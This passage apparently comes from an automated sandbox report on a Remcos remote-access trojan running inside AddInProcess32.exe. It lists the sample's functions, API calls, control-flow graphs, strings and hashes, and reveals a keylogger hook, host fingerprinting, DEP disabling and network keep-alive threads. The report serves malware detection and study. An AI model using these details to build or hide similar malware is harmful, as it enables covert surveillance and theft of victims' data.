                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                        • API String ID: 384173800-625181639
                                                                                                        • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                        • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                        • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                        • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                                                                        Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1259 4099e4-4099fd 1260 409a63-409a73 GetMessageA 1259->1260 1261 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1259->1261 1262 409a75-409a8d TranslateMessage DispatchMessageA 1260->1262 1263 409a8f 1260->1263 1261->1260 1264 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1261->1264 1262->1260 1262->1263 1265 409a91-409a96 1263->1265 1264->1265
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                        • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                        • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                        • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                        • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                        Strings
                                                                                                        • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                        • String ID: Keylogger initialization failure: error
                                                                                                        • API String ID: 3219506041-952744263
                                                                                                        • Opcode ID: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
                                                                                                        • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                        • Opcode Fuzzy Hash: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
                                                                                                        • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                                        Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                        • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                        • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                        • API String ID: 2281282204-3981147832
                                                                                                        • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                        • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                        • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                        • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                        Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1419 404915-404924 1420 4049b1 1419->1420 1421 40492a-404931 1419->1421 1422 4049b3-4049b7 1420->1422 1423 404933-404937 1421->1423 1424 404939-404940 1421->1424 1425 404987-4049af CreateEventA CreateThread 1423->1425 1424->1425 1426 404942-404982 GetLocalTime call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1424->1426 1425->1422 1426->1425
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                        Strings
                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Create$EventLocalThreadTime
                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                        • API String ID: 2532271599-1507639952
                                                                                                        • Opcode ID: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
                                                                                                        • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                        • Opcode Fuzzy Hash: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
                                                                                                        • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                        Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1815803762-0
                                                                                                        • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                        • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                        • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                        • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                        Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                        • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Name$ComputerUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 4229901323-0
                                                                                                        • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                        • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                        • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                        • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                        Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                        • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                        • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                        • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                        Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: recv
                                                                                                        • String ID:
                                                                                                        • API String ID: 1507349165-0
                                                                                                        • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                        • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                        • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                        • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                        Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 48 40dc96-40dca7 call 401eea 23->48 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 90 40d9b5-40d9bc 79->90 91 40d9ae-40d9b0 79->91 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 92 40d9c0-40d9cc call 41a463 90->92 93 40d9be 90->93 96 40dc95 91->96 103 40d9d5-40d9d9 92->103 104 40d9ce-40d9d0 92->104 93->92 96->48 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 128 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->128 129 40da2d call 4069ba 107->129 117 40d9e0-40d9e2 108->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->107 138 40da03-40da09 121->138 163 40db22-40db26 128->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 128->164 129->128 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 169->178 199 40dbf3 178->199 200 40dbe6-40dbf1 call 436050 178->200 188->163 203 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 199->203 200->203 257 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 203->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->96 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 0040D790
                                                                                                          • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                        • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                        • API String ID: 2830904901-1270962267
                                                                                                        • Opcode ID: e8797fa57673ca009fe612506f7e0eb5f6828236eb387c2265590f5324755a6b
                                                                                                        • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                        • Opcode Fuzzy Hash: e8797fa57673ca009fe612506f7e0eb5f6828236eb387c2265590f5324755a6b
                                                                                                        • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                                                                        Function 00413FD4 Relevance: 48.1, APIs: 5, Strings: 22, Instructions: 813sleepnetworkCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 447 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 583 414b54-414b66 call 4047eb call 4020b4 559->583 565 4142ca-4142df call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a686 560->566 582 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 565->582 565->583 566->583 647 414434-414441 call 40541d 582->647 648 414446-41446d call 401e8f call 412513 582->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 583->596 597 414b8e-414b96 call 401d8c 583->597 596->597 597->476 647->648 654 414474-414830 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c 648->654 655 41446f-414471 648->655 781 414832 call 404468 654->781 655->654 782 414837-414abb call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 781->782 900 414ac0-414ac7 782->900 901 414ac9-414ad0 900->901 902 414adb-414ae2 900->902 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 